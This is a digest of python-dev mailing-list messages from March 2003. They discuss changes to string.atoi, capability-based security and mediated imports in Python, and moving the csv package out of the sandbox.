From ben@algroup.co.uk  Tue Mar 18 09:43:36 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 18 Mar 2003 09:43:36 +0000
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
Message-ID: <3E76EA48.7070402@algroup.co.uk>

Brett Cannon wrote:
> There was talk of a PEP on all of this but one has not appeared yet.

I am working on it now.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From mal@lemburg.com  Tue Mar 18 09:50:29 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 18 Mar 2003 10:50:29 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
Message-ID: <3E76EBE5.8020200@lemburg.com>

Raymond Hettinger wrote:
> The shortcut is to fix something that isn't broken and have string.atoi
> stop automatically appending the ten to the int() call.
> 
> Current string.atoi:
>     def atoi(s, base=10):
>         return _int(s, base)
> 
> Proposed string.atoi:
>     def atoi(s, *args):
>         return _int(s, *args)
> 
> The shortcut has some appeal because it lets the improvements
> to _tkinter stay in place and allows existing Pmw installations
> to continue to operate.  Otherwise, one of the two has to change.
> 
> Does anyone think changing string.atoi is the wrong way to go?

Yes, because it changes the semantics. string.atoi() would suddenly
start to accept non-strings like integers, floats, etc.
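
A quick check of what the proposed body would let through, run on Python 3 with a re-created function (atoi_proposed is a name chosen here, not the stdlib function). It also covers the hex-literal worry raised earlier in the thread.

```python
def atoi_proposed(s, *args):
    # Re-creation of the proposed body; with no base given, int() takes any number.
    return int(s, *args)


# Non-string arguments are silently converted instead of rejected.
accepted = [atoi_proposed(7), atoi_proposed(3.9), atoi_proposed(True)]
print(accepted)  # [7, 3, 1]

# A prefixed literal is still refused when no base is passed.
try:
    atoi_proposed("0x10")
    hex_literal_accepted = True
except ValueError:
    hex_literal_accepted = False
print(hex_literal_accepted)  # False
```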

My suggestion would be to carefully reconsider the changes to
_tkinter. If it's true that a method can now return strings *and*
integers which previously only returned strings, then such a
change is clearly not backward compatible.  I'd create a new
method for the new semantics in that case.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 18 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     14 days left
EuroPython 2003, Charleroi, Belgium:                        98 days left


From ben@algroup.co.uk  Tue Mar 18 09:54:06 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 18 Mar 2003 09:54:06 +0000
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
Message-ID: <3E76ECBE.7050200@algroup.co.uk>

Brett Cannon wrote:
> Capabilities can loosely be thought of like bound methods.  Security with
> capabilities is done based on possession; if you hold a reference to an
> object you can use that object.

This confusion is my fault: I just happened to like using bound methods 
as the basis for capabilities, but objects can also be used, so long as 
access to them is appropriately restricted. This is explained in detail 
in the PEP I am writing (with help from others, I should note).

> Proxies are a wrapper around objects that restrict access to the object.
> This restriction extends all the way to the core; even core code can't get
> access to parts of a proxied object that it doesn't want any object to get
> a hold of.

It's not clear to me what you mean by "core code" - certainly anything 
written in C can slice through a proxy without any problems (or, indeed, 
a capability).

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From mal@lemburg.com  Tue Mar 18 10:27:14 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 18 Mar 2003 11:27:14 +0100
Subject: [Python-Dev] capabilities & proxies (python-dev Summary for 2003-03-01
 through 2003-03-15)
In-Reply-To: <3E76ECBE.7050200@algroup.co.uk>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <3E76ECBE.7050200@algroup.co.uk>
Message-ID: <3E76F482.7030508@lemburg.com>

Ben Laurie wrote:
> Brett Cannon wrote:
> 
>> Capabilities can loosely be thought of like bound methods.  Security with
>> capabilities is done based on possession; if you hold a reference to an
>> object you can use that object.
> 
> 
> This confusion is my fault: I just happened to like using bound methods 
> as the basis for capabilities, but objects can also be used, so long as 
> access to them is appropriately restricted. This is explained in detail 
> in the PEP I am writing (with help from others, I should note).
> 
>> Proxies are a wrapper around objects that restrict access to the object.
>> This restriction extends all the way to the core; even core code can't 
>> get
>> access to parts of a proxied object that it doesn't want any object to 
>> get
>> a hold of.
> 
> It's not clear to me what you mean by "core code" - certainly anything 
> written in C can slice through a proxy without any problems (or, indeed, 
> a capability).

That's certainly true...

BTW, just in case you aren't aware of it, mxProxy implements pretty
much what Brett summarized here for proxies. You may want to have
a look.

-- 
Marc-Andre Lemburg
eGenix.com



From zooko@zooko.com  Tue Mar 18 11:40:41 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 06:40:41 -0500
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: Message from Brett Cannon <bac@OCF.Berkeley.EDU>
 of "Mon, 17 Mar 2003 15:11:46 PST." <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
Message-ID: <E18vFST-0000U4-00@localhost>

> Capabilities can loosely be thought of like bound methods.  Security with
> capabilities is done based on possession; if you hold a reference to an
> object you can use that object.

No -- capabilities (as envisioned for Python) are references.  Whether a 
reference to an object, to a bound method, or to a function doesn't matter.

Note that it isn't that capabilities are "like" references, it is that 
capabilities *are* references.  Every reference is a capability.  Every 
capability is a reference.

> Security with
> capabilities is done based on possession; if you hold a reference to an
> object you can use that object.

Yes.

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Tue Mar 18 12:15:09 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 18 Mar 2003 07:15:09 -0500
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: "Your message of Tue, 18 Mar 2003 10:50:29 +0100."
 <3E76EBE5.8020200@lemburg.com>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
 <3E76EBE5.8020200@lemburg.com>
Message-ID: <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>

> > Does anyone think changing string.atoi is the wrong way to go?
> 
> Yes, because it changes the semantics. string.atoi() would suddenly
> start to accept non-strings like integers, floats, etc.
> 
> My suggestion would be to carefully reconsider the changes to
> _tkinter. If it's true that a method can now return strings *and*
> integers which previously only returned strings, then such a
> change is clearly not backward compatible.  I'd create a new
> method for the new semantics in that case.

That's my gut feeling too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ben@algroup.co.uk  Tue Mar 18 12:11:09 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 18 Mar 2003 12:11:09 +0000
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <E18vFST-0000U4-00@localhost>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <E18vFST-0000U4-00@localhost>
Message-ID: <3E770CDD.7050206@algroup.co.uk>

Zooko wrote:
>>Capabilities can loosely be thought of like bound methods.  Security with
>>capabilities is done based on possession; if you hold a reference to an
>>object you can use that object.
> 
> 
> No -- capabilities (as envisioned for Python) are references.  Whether a 
> reference to an object, to a bound method, or to a function doesn't matter.
> 
> Note that it isn't that capabilities are "like" references, it is that 
> capabilities *are* references.  Every reference is a capability.  Every 
> capability is a reference.

I should note that this is a new (and good) idea, not one that we've 
previously expressed. And, of course, they are references with 
restrictions, which will be spelt out in the PEP.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From zooko@zooko.com  Tue Mar 18 12:41:23 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 07:41:23 -0500
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: Message from Zooko <zooko@zooko.com>
 of "Tue, 18 Mar 2003 06:40:41 EST." <E18vFST-0000U4-00@localhost>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>  <E18vFST-0000U4-00@localhost>
Message-ID: <E18vGPD-0000Zv-00@localhost>

brett@python.org wrote:
>
> Security with capabilities is done based on possession; if you hold a 
> reference to an object you can use that object.

Note that you can use capabilities as your sole access control mechanism if 
every resource that you want to protect is identifiable with a Python reference.

For example, suppose you want to control the ability to listen on sockets for 
network traffic.  If there is a reference (e.g., to an object) that represents 
the privilege of listening on sockets, then you can give such a reference to one 
object, allowing that object to listen on sockets, while withholding it from 
another object, thus preventing that one from listening on sockets.

The only part of Python that isn't already well-matched with capabilities is the 
way that authority is gained by importing modules: you can load a module 
even when you weren't given a reference to it.  Reconciling Python modules with 
capabilities would be the challenging part.  Python objects, bound methods, 
functions, and suchlike are already well-matched to capabilities.

In case that isn't clear, I'll write a quick example.  Recalling my "tic-tac-toe 
game" example from [1], I wrote code which allowed or denied the tic-tac-toe 
game to paint a window on the screen and to write to a file.  This "allow-or-
deny" enforcement was unified with the designation of which window and which 
file.  That is: by passing a reference to a certain window, I simultaneously 
told the tic-tac-toe game which window to draw in *and* extended to it the 
privilege of drawing to the screen.

This is a central motto of the capability security crowd: "Unify designation 
with authority."
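
A minimal sketch of that motto in present-day Python, for illustration only. 
The name `play_game` and the in-memory file are hypothetical stand-ins, not 
code from the message referenced in [1].  The single argument both names the 
output destination and is the only means the callee is handed for writing.

```python
import io


def play_game(log):
    """Hypothetical game: it writes only to the object it was handed."""
    log.write("X takes the centre square\n")
    log.write("X wins\n")


# The caller designates *which* file and grants write access in one act.
transcript = io.StringIO()
play_game(transcript)
print(transcript.getvalue(), end="")
```

In ordinary Python nothing stops play_game from calling open() on its own, 
so the sketch shows the calling convention rather than any enforcement.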

In a capability system *all* authority -- everything that you could ever want to 
prevent -- is mediated by capabilities.  Code that is loaded and run, but to 
which no capabilities are extended, must be incapable of doing anything 
dangerous.

Now, what about modules?  In current Python, some code can "import os" and gain 
all kinds of authority.  In the rexec scheme, as I understand it, there was a 
handler function which could be overridden to determine what happens when I try 
"import os".  This is effectively a "policy mini-language", such as in the 
hypothetical "restricted Python v2" [1].

(Guido has pointed out that this overridable policy handler could be used to 
implement capabilities as well as other regimes.  I think I agree in principle, 
but what I am advocating here is having the core language implement capabilities 
so that the programmer-visible part is as minimal and unified as possible.)

Now what I would *like* is that, instead of the code doing "import os" itself, 
the caller provides, or doesn't provide, the os module as part of the 
construction/invocation of A.

I don't have a clear idea yet of how that could be implemented in a Pythonic, 
compatible way.

Just to help me think about it I'll suggest a non-Pythonic and incompatible way: 
there is no "import" keyword.  When you invoke a constructor, function, method, 
etc., you have to pass as arguments references to everything that the code will 
need to do its job.  So, assuming the tic-tac-toe game requires the "math" 
module and the "string" module, I would have to write:

# restricted Python v3+modules
game = TicTacToeGame()
game.display(open("/tmp/tttgame.out","w"), math, string)

The burden of typing in dozens of module names with each invocation can be eased 
by: 1. bundling modules together (put math, string, and some other stuff into 
one object/module/package named "standardstuff" and pass that as an argument), 
2. "safe" modules that nobody could ever wish to prevent could be globally 
available (via the resurrected "import" keyword, I guess).

If math and string are both "safe", then the example goes back to:

# restricted Python v3+modules
game = TicTacToeGame()
# a game against itself that writes results to a file
game.display(open("/tmp/tttgame.out","w"))

# a game against remote, listening on a socket
game.display(open("/tmp/tttgame.out","w"), socket)

(Note that there is a bootstrapping problem -- *some* code has to receive a 
reference to the os module ex nihilo.  That code should be "trusted" code -- the 
Python interpreter, basically.)

Ah, but this last line shows another problem -- the game now has the socket 
module, and the ability to open sockets to remote hosts and more.  I just wanted 
to allow it to listen on a particular port!  The code would be safer if I didn't 
pass the large-grained module and instead passed a specific object:

# a game against remote, listening on a socket
listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listensocket.bind(('daring.cwi.nl', 8901,))
game.display(open("/tmp/tttgame.out","w"), listensocket)

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/033938.html


From zooko@zooko.com  Tue Mar 18 12:44:47 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 07:44:47 -0500
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: Message from Ben Laurie <ben@algroup.co.uk>
 of "Tue, 18 Mar 2003 12:11:09 GMT." <3E770CDD.7050206@algroup.co.uk>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <E18vFST-0000U4-00@localhost>  <3E770CDD.7050206@algroup.co.uk>
Message-ID: <E18vGSV-0000bt-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Ben Laurie <ben@algroup.co.uk> wrote:
>
> > No -- capabilities (as envisioned for Python) are references.  Whether a 
> > reference to an object, to a bound method, or to a function doesn't matter.
> 
> I should note that this is a new (and good) idea, not one that we've 
> previously expressed. And, of course, they are references with 
> restrictions, which will be spelt out in the PEP.

Yes.  It isn't that Brett missed something and I corrected him, it's that I just 
asserted an idea that hasn't previously been posted to the list.

Is the python-dev summary allowed to describe ideas posted in discussion of the 
python-dev summary?  ;-)

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Tue Mar 18 13:56:12 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 18 Mar 2003 08:56:12 -0500
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: Your message of "Tue, 18 Mar 2003 07:15:09 EST."
 <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer> <3E76EBE5.8020200@lemburg.com>
 <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303181356.h2IDuEv19695@odiug.zope.com>

[RH]
> > > Does anyone think changing string.atoi is the wrong way to go?

[MAL]
> > Yes, because it changes the semantics. string.atoi() would suddenly
> > start to accept non-strings like integers, floats, etc.
> > 
> > My suggestion would be to carefully reconsider the changes to
> > _tkinter. If it's true that a method can now return strings *and*
> > integers which previously only returned strings, then such a
> > change is clearly not backward compatible.  I'd create a new
> > method for the new semantics in that case.

[GvR]
> That's my gut feeling too.

I misspoke.  I agree with MAL that string.atoi() shouldn't be
changed.  But I didn't mean to imply that I wanted the changes to
_tkinter and Tkinter to be rolled back.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@pythoncraft.com  Tue Mar 18 16:25:07 2003
From: aahz@pythoncraft.com (Aahz)
Date: Tue, 18 Mar 2003 11:25:07 -0500
Subject: [Python-Dev] Capabilities
Message-ID: <20030318162507.GB13338@panix.com>

On Tue, Mar 18, 2003, Zooko wrote:
>
> No -- capabilities (as envisioned for Python) are references.  Whether
> a reference to an object, to a bound method, or to a function doesn't
> matter.
>
> Note that it isn't that capabilities are "like" references, it is
> that capabilities *are* references.  Every reference is a capability.
> Every capability is a reference.

<blink>  Are you saying that an int is a capability?
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From aahz@pythoncraft.com  Tue Mar 18 16:26:23 2003
From: aahz@pythoncraft.com (Aahz)
Date: Tue, 18 Mar 2003 11:26:23 -0500
Subject: [Python-Dev] capability-mediated modules
Message-ID: <20030318162623.GC13338@panix.com>

On Tue, Mar 18, 2003, Zooko wrote:
>
> For example, suppose you want to control the ability to listen on
> sockets for network traffic.  If there is a reference (e.g., to an
> object) that represents the privilege of listening on sockets, then
> you can give such a reference to one object, allowing that object
> to listen on sockets, while withholding it from another object, thus
> preventing that one from listening on sockets.

Doesn't that only work if the second object never gains a reference to
the first object?
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From zooko@zooko.com  Tue Mar 18 16:55:05 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 11:55:05 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Aahz <aahz@pythoncraft.com>
 of "Tue, 18 Mar 2003 11:25:07 EST." <20030318162507.GB13338@panix.com>
References: <20030318162507.GB13338@panix.com>
Message-ID: <E18vKMj-0002Zb-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Aahz <aahz@pythoncraft.com> wrote:
>
> > No -- capabilities (as envisioned for Python) are references.  Whether
> > a reference to an object, to a bound method, or to a function doesn't
> > matter.
> >
> > Note that it isn't that capabilities are "like" references, it is
> > that capabilities *are* references.  Every reference is a capability.
> > Every capability is a reference.
> 
> <blink>  Are you saying that an int is a capability?

Do you mean: references are really just memory addresses?  Python has pointer-
safety so Python code cannot access a Python object without a reference to it, 
even if it knows that object's memory address.  This is the first requirement 
listed in this message: [1].

Or do you mean: I could have a reference to some fundamental computational 
concept like an int -- would that reference be a capability?

I would say yes, all references, even to some basic programming language 
constructs like None or True, are capabilities.  Things like None, True, 
integers, etc., need to be available to all code (just so that we don't have to 
pass the same bundle of dozens of standard references to every object we 
create).  Fortunately they can also be made safe so that it is okay for 
untrusted code to access them.  Unfortunately the current implementations of 
things like None are not safe [2].

This is part of the third requirement listed in [1].

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/033891.html
[2] http://mail.python.org/pipermail/python-dev/2003-March/033945.html


From pje@telecommunity.com  Tue Mar 18 17:41:01 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 18 Mar 2003 12:41:01 -0500
Subject: [Python-Dev] capability-mediated modules
Message-ID: <5.1.1.6.0.20030318123644.01dfe310@mail.rapidsite.net>

Zooko wrote:
> Just to help me think about it I'll suggest a non-Pythonic and incompatible
> way: there is no "import" keyword.  When you invoke a constructor, function,
> method, etc., you have to pass as arguments references to everything that
> the code will need to do its job.  So, assuming the tic-tac-toe game
> requires the "math" module and the "string" module, I would have to write:

There's a *much* simpler way to do this.  'import' is implemented by 
calling an '__import__' function -- which of course is a capability.  To do 
mediated imports, it's only necessary to supply a mediating version of 
'__import__'.  One also needs a specialized version of '__import__' to set 
up a newly imported module's builtins.
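
A rough sketch of the mediating '__import__' idea, written for current Python 
(where the module is called `builtins`; in 2003 it was `__builtin__`).  The 
helper names `make_mediated_import` and `run_with_imports` are hypothetical, 
and this is only an illustration of the hook, not a secure sandbox.

```python
import builtins


def make_mediated_import(allowed):
    """Return an __import__ replacement permitting only `allowed` top-level names."""
    real_import = builtins.__import__

    def mediated_import(name, globals=None, locals=None, fromlist=(), level=0):
        top_level = name.partition(".")[0]
        if top_level not in allowed:
            raise ImportError("import of %r is not permitted" % name)
        return real_import(name, globals, locals, fromlist, level)

    return mediated_import


def run_with_imports(source, allowed):
    """Execute `source` with builtins that hold only the mediated __import__."""
    env = {"__builtins__": {"__import__": make_mediated_import(allowed)}}
    exec(source, env)
    return env


env = run_with_imports("import math\nroot = math.sqrt(16)", {"math"})
print(env["root"])

try:
    run_with_imports("import os", {"math"})
except ImportError as exc:
    print("blocked:", exc)
```

Note that a module loaded this way still runs with the ordinary builtins, 
which is the gap the remark about setting up a newly imported module's 
builtins is pointing at.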


From zooko@zooko.com  Tue Mar 18 18:01:05 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 13:01:05 -0500
Subject: [Python-Dev] capability-mediated modules
In-Reply-To: Message from "Phillip J. Eby" <pje@telecommunity.com>
 of "Tue, 18 Mar 2003 12:41:01 EST." <5.1.1.6.0.20030318123644.01dfe310@mail.rapidsite.net>
References: <5.1.1.6.0.20030318123644.01dfe310@mail.rapidsite.net>
Message-ID: <E18vLOb-0006ln-00@localhost>

 "Phillip J. Eby" <pje@telecommunity.com> wrote:
>
> There's a *much* simpler way to do this.  'import' is implemented by 
> calling an '__import__' function -- which of course is a capability.  To do 
> mediated imports, it's only necessary to supply a mediating version of 
> '__import__'.  One also needs a specialized version of '__import__' to set 
> up a newly imported module's builtins.

I'm aware of this feature, but I was groping for a more elegant (and more 
capability-flavored) way to do it.

As far as I can tell, the technique you describe is the "policy mini-language" 
way to implement access control.  If I want a certain chunk of code to have 
access to a certain module, I set the policy with an overridable handler or a 
configuration object, specifying that this code is allowed to have access to 
this module, and then I invoke the code.

This is analogous to "restricted Python v2"'s way of controlling access to 
certain resources in this e-mail message [1].

If I change my mind about how the code should work, I have to make changes in 
two places: first the part of the code that says "import spam" has to change to 
say "import eggs", and second the policy configuration has to change from 
"suchandsuch is allowed to import spam" to "suchandsuch is allowed to import 
eggs".

In a pure capability language like E, whenever a module is imported it comes 
into life without permission to do anything, and then the importer grants it 
permission to do whatever it needs to do (by passing references).  This is more 
like "restricted Python v3" in that designating which module the code ought to 
use, and authorizing the code to use that module, are both done in the same act 
(by passing a reference to the module in question).

There is a description with examples in the "E in a Walnut" book [2].

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/033938.html
[2] http://www.skyhunter.com/marcs/ewalnut.html#SEC16


From zooko@zooko.com  Tue Mar 18 16:36:42 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 11:36:42 -0500
Subject: [Python-Dev] capability-mediated modules
In-Reply-To: Message from Aahz <aahz@pythoncraft.com>
 of "Tue, 18 Mar 2003 11:26:23 EST." <20030318162623.GC13338@panix.com>
References: <20030318162623.GC13338@panix.com>
Message-ID: <E18vK4w-0002LB-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Aahz <aahz@pythoncraft.com> wrote:
>
> > For example, suppose you want to control the ability to listen on
> > sockets for network traffic.  If there is a reference (e.g., to an
> > object) that represents the privilege of listening on sockets, then
> > you can give such a reference to one object, allowing that object
> > to listen on sockets, while withholding it from another object, thus
> > preventing that one from listening on sockets.
> 
> Doesn't that only work if the second object never gains a reference to
> the first object?

This is why real mandatory private data is needed.  The second object could have 
a reference to the first object, and could use the first object through some 
interface offered by the first object, without being able to access the first 
object's socket-listener capability.
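
A small sketch of that arrangement, assuming a closure as the hiding 
mechanism.  `FakeListener`, `make_server` and `untrusted_client` are 
hypothetical names, and the listener is a stand-in rather than a real socket.

```python
class FakeListener:
    """Stand-in for a socket-listening capability (hypothetical)."""

    def __init__(self, port):
        self.port = port
        self.accepted = 0

    def accept(self):
        self.accepted += 1
        return "connection-%d" % self.accepted


def make_server(listener):
    """First object: holds the listener and exposes one narrow operation."""

    def handle_one():
        return "handled " + listener.accept()

    return handle_one


def untrusted_client(server):
    """Second object: may call the server but is never handed the listener."""
    return server()


server = make_server(FakeListener(8901))
print(untrusted_client(server))
```

In CPython the listener can still be dug out through the function's 
__closure__ attribute, so this hiding is by convention only, which is why 
mandatory private data is called for above.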

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From martin@v.loewis.de  Tue Mar 18 20:40:32 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 18 Mar 2003 21:40:32 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <3E76EBE5.8020200@lemburg.com>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
 <3E76EBE5.8020200@lemburg.com>
Message-ID: <m3of481k8v.fsf@mira.informatik.hu-berlin.de>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> If it's true that a method can now return strings *and*
> integers which previously only returned strings

That is not true.

Regards,
Martin


From martin@v.loewis.de  Tue Mar 18 20:41:50 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 18 Mar 2003 21:41:50 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <200303181356.h2IDuEv19695@odiug.zope.com>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
 <3E76EBE5.8020200@lemburg.com>
 <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>
 <200303181356.h2IDuEv19695@odiug.zope.com>
Message-ID: <m3k7ew1k6p.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> I misspoke.  I agree with MAL that string.atoi() shouldn't be
> changed.  But I didn't mean to imply that I wanted the changes to
> _tkinter and Tkinter to be rolled back.

I'd like to understand the problem with Pmw first, and I agree that
changing atoi is not the right solution, regardless of what the
problem is.

Regards,
Martin


From drifty@alum.berkeley.edu  Tue Mar 18 21:45:35 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Tue, 18 Mar 2003 13:45:35 -0800 (PST)
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <E18vGSV-0000bt-00@localhost>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
 <E18vFST-0000U4-00@localhost>  <3E770CDD.7050206@algroup.co.uk>
 <E18vGSV-0000bt-00@localhost>
Message-ID: <Pine.SOL.4.53.0303181344540.20827@death.OCF.Berkeley.EDU>

[Zooko]

> Is the python-dev summary allowed to describe ideas posted in discussion of the
> python-dev summary?  ;-)
>

This is all going into the current summary.  Wasn't expecting this to
generate new content, though.  =)

-Brett


From tismer@tismer.com  Tue Mar 18 22:46:11 2003
From: tismer@tismer.com (Christian Tismer)
Date: Tue, 18 Mar 2003 23:46:11 +0100
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <Pine.SOL.4.53.0303181344540.20827@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <E18vFST-0000U4-00@localhost>  <3E770CDD.7050206@algroup.co.uk>  <E18vGSV-0000bt-00@localhost> <Pine.SOL.4.53.0303181344540.20827@death.OCF.Berkeley.EDU>
Message-ID: <3E77A1B3.7040108@tismer.com>

Brett Cannon wrote:
> [Zooko]
> 
> 
>>Is the python-dev summary allowed to describe ideas posted in discussion of the
>>python-dev summary?  ;-)
>>
> 
> 
> This is all going into the current summary.  Wasn't expecting this to
> generate new content, though.  =)

Hee hee, be aware of infinite recursion :-)

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From csv@mail.mojam.com  Tue Mar 18 23:09:46 2003
From: csv@mail.mojam.com (Skip Montanaro)
Date: Tue, 18 Mar 2003 17:09:46 -0600
Subject: [Python-Dev] csv package ready for prime-time?
Message-ID: <15991.42810.167975.876841@montanaro.dyndns.org>

I'm ready to move the csv package out of the sandbox into the main CVS
trunk.  Since my last post there have been a few changes and comments:

    * Cliff Wells contributed his csv file parameter sniffing code

    * The installation is now a package instead of a single module (not sure
      if the docs have caught up with this change yet)

    * On the mailing list, the following threads of significance are found:

      - John Machin pointed out a few bugs and raised issues with my
        decision to ignore blank lines in my DictReader class.  I don't
        believe we ever reached a consensus we were both happy with.  (That
        is, John may still be slightly unhappy with the current results.  I
        didn't change the behavior as a result of the thread.)

      - Andrew Dalke reported some problems using a space character as the
        delimiter which appear to be resolved.
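
For readers who want to see the two features mentioned above, here is a short
sketch using the `csv` module as it ships in today's standard library.  The
sandbox version discussed in this message may have behaved differently, and
the sample data is made up.

```python
import csv
import io

sample = "name;qty\nspam;3\n\neggs;12\n"

# Sniffer guesses the dialect; restricting the candidate delimiters
# keeps the guess predictable on a sample this small.
dialect = csv.Sniffer().sniff(sample, delimiters=";,")

# DictReader skips the blank line between the two records.
rows = list(csv.DictReader(io.StringIO(sample), dialect=dialect))
for row in rows:
    print(row["name"], row["qty"])
```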

Is there a formal process for "dusting off" software which has been playing
in the sandbox?  What about getting PEP 305 stamped with the BDFL seal of
approval?  (I realize Guido's busy in the run-up to PyCon.)

As a gentle reminder, the relevant URLs are

    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/nondist/sandbox/csv/
    http://www.python.org/peps/pep-0305.html

You can browse the mailing list archives at

    http://manatee.mojam.com/pipermail/csv

You can check out the code and play with it fairly easily.  From your
sandbox directory execute

    cvs up -dP .
    cd csv
    python setup.py install

Feedback to the csv mailing list please (Reply-To: adjusted accordingly).

Skip


From greg@cosc.canterbury.ac.nz  Tue Mar 18 23:17:55 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 19 Mar 2003 11:17:55 +1200 (NZST)
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: <E18vGPD-0000Zv-00@localhost>
Message-ID: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>

Zooko <zooko@zooko.com>:

> Now what I would *like* is that instead of doing "import os" to load code, 
> instead the caller provides, or doesn't provide the os module as part of the 
> construction/invocation of A.
> 
